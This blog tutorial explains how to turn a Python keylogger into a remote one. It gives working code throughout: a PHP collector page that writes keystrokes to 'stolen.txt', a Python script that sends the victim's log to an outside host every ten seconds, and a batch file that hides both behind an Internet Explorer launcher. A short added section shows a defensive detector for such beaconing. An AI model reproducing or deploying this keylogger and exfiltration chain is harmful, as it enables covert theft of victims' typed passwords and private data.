Some weeks ago we wrote about How to Write A Keylogger in Python. If you haven't checked it out yet, well, do it!
In this post, we will convert that local keylogger into a remote keylogger. We will talk about modifying the keylogger so that it sends the logged information to a remote server, where you can easily see which characters were typed by the person on whose system the keylogger was running.
NOTE: The following tutorial is for educational purposes only. It is to make people aware about security, and to convey how easy it is to obtain private information from a system. We will not be held responsible for ANY malicious usage whatsoever. DO NOT TRY THIS AT HOME OR ANYWHERE ELSE!
The script that we wrote in the above-mentioned post just logs the keystrokes into a file on the victim's computer. Now, we can use some more scripts written in Python and PHP to send these logs to a website. If you don't own a website, don't worry. You can get one at 000webhost.com. We will not go into the details on how to do so, as the website itself provides a very user-friendly interface.

=>Go to the cPanel of your website. Open the File Manager, after logging in by entering the required username and password.
=>Go to public_html folder and create a new file. Let's call it collect.php. Now paste the following code in collect.php and save it:
<?php
$collectedData = $_GET["keylog"];
$file = fopen('stolen.txt','a');
fwrite($file,$collectedData.'\n\n');
fclose($file);
echo '<b>Sorry , this page is under construction</b></br></br>Please Click<a
href="http://www.google.com/">here</a> to go back to previous page ';
?>
=>Now, create another file named stolen.txt. This file will contain the contents of the keylog.txt file that is present on the victim's computer.
=>Now, the only thing left is to send the contents of the keylog file to the above PHP page, so that it appends the required contents to the stolen.txt file present on our website. Create a new file named send.pyw and place it in the same folder as the one that contains the remoteKeylogger.pyw file. Paste the following code into the send.pyw file:
import urllib2
import urllib
from time import sleep
import ssl
ssl._create_default_https_context = ssl._create_unverified_context
headers = {'User-Agent':'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:37.0) Gecko/20100101 Firefox/37.0'}
f = open('keylog.txt','r')
while True:
sleep(10)
data = f.read()
info = {'keylog':data}
info = urllib.urlencode(info)
print(info)
url = 'http://emailanonymous.netne.net/collect.php?keylog='+info
req = urllib2.Request(url,headers = headers)
resp = urllib2.urlopen(req)
print("SENT\n\n")
print("URL: ",resp.geturl())
f.close()
This file will simply read the contents of the keylog.txt file every 10 seconds and send it to our PHP page by encoding it into the URL.
=>Now, remove the launch.bat file and create a new launch.bat file that contains the following code:
@echo off
start "" ".\keylogger.pyw"
start "" ".\send.pyw"
start "" "C:\Program Files\Internet Explorer\iexplore.exe"
And it's done! Now, whenever a user opens up our "malicious" Internet Explorer, our keylogging and sending scripts will launch themselves in the background, without anyone's knowledge. Below is a screenshot of a sample stolen.txt file:
The above example shows how small programs can do big things. Of course, there is plenty of room for improvement in this application, so do share with us if you can "fix" some bugs in it. Once again, do NOT use it for wrong purposes; you will be responsible for anything you do with it!
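From the defender's side, the sender described above is recognizable from its network pattern alone: a GET to the same path, with data in the query string, repeated at a fixed interval even when nothing was typed. The following detection sketch is an added example, not code from the original post; the log format, host names, addresses and thresholds are assumptions constructed for illustration.

```python
import statistics
from collections import defaultdict
from datetime import datetime
from urllib.parse import urlsplit

# Constructed proxy-log sample: ISO timestamp, client IP, method, URL.
# Host names and addresses are placeholders, not values from the article.
SAMPLE_LOG = """\
2024-05-01T09:00:00 10.0.0.5 GET http://collector.example/collect.php?keylog=keylog=hello
2024-05-01T09:00:10 10.0.0.5 GET http://collector.example/collect.php?keylog=keylog=
2024-05-01T09:00:20 10.0.0.5 GET http://collector.example/collect.php?keylog=keylog=pass
2024-05-01T09:00:31 10.0.0.5 GET http://collector.example/collect.php?keylog=keylog=
2024-05-01T09:00:40 10.0.0.5 GET http://collector.example/collect.php?keylog=keylog=
2024-05-01T09:00:50 10.0.0.5 GET http://collector.example/collect.php?keylog=keylog=word
2024-05-01T09:00:03 10.0.0.7 GET http://intranet.example/search?q=vpn+setup
2024-05-01T09:00:45 10.0.0.7 GET http://intranet.example/search?q=vpn+client
2024-05-01T09:02:10 10.0.0.7 GET http://intranet.example/search?q=holiday+form
2024-05-01T09:02:12 10.0.0.7 GET http://intranet.example/search?q=holiday
2024-05-01T09:05:00 10.0.0.7 GET http://intranet.example/search?q=expenses
2024-05-01T09:05:30 10.0.0.7 GET http://intranet.example/search?q=expenses+2024
"""

def find_beacons(log_text, min_hits=5, max_jitter=1.5):
    """Return (client, host, path, period_s) for GETs repeating at a steady interval."""
    groups = defaultdict(list)
    for line in log_text.splitlines():
        parts = line.split(maxsplit=3)
        if len(parts) != 4 or parts[2] != "GET":
            continue
        ts, client, _, url = parts
        u = urlsplit(url)
        if u.query:  # only requests that carry data in the query string
            groups[(client, u.hostname, u.path)].append(datetime.fromisoformat(ts))
    hits = []
    for (client, host, path), times in groups.items():
        if len(times) < min_hits:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        period = statistics.median(gaps)
        # Human browsing has widely varying gaps; a timer loop does not.
        if period > 0 and statistics.pstdev(gaps) <= max_jitter:
            hits.append((client, host, path, period))
    return sorted(hits)

if __name__ == "__main__":
    for hit in find_beacons(SAMPLE_LOG):
        print(hit)
```

The thresholds (`min_hits`, `max_jitter`) need tuning against real traffic, since legitimate polling clients also produce steady intervals and should be allow-listed by destination.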
PS: Thanks to this YouTube video for teaching me how to write a local keylogger and for encouraging me to write this remote keylogger.
Please comment below for further queries, suggestions or improvements. :)
If I open the stolen.txt file all I can see is an endless string of n...
Something like this:
nnnnnnnnnnnnnn
Why?
It's because the above script uploads the text file every 10 seconds. So probably no keyboard input was there during those time slots. That is why newline characters were shown in the file.